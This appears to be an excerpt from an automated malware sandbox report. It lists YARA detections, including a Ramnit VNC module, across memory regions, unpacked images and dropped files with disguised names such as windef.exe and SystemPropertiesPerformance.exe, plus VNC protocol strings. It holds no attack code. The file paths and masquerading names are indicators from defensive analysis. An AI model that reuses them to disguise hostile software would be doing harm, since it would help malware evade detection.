Source: Yara match File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match File source: dropped/windef.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Yara detected Ramnit VNC Module
Source: Yara match File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: dropped/vnc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Contains VNC / remote desktop functionality (version string found)
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp String found in binary or memory: RFB 003.008
Source: vnc.exe String found in binary or memory: RFB 003.008
Source: vnc.exe, 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp String found in binary or memory: RFB 003.008
Source: svchost.exe String found in binary or memory: RFB 003.008
Source: CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp String found in binary or memory: RFB 003.008
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp String found in binary or memory: RFB 003.008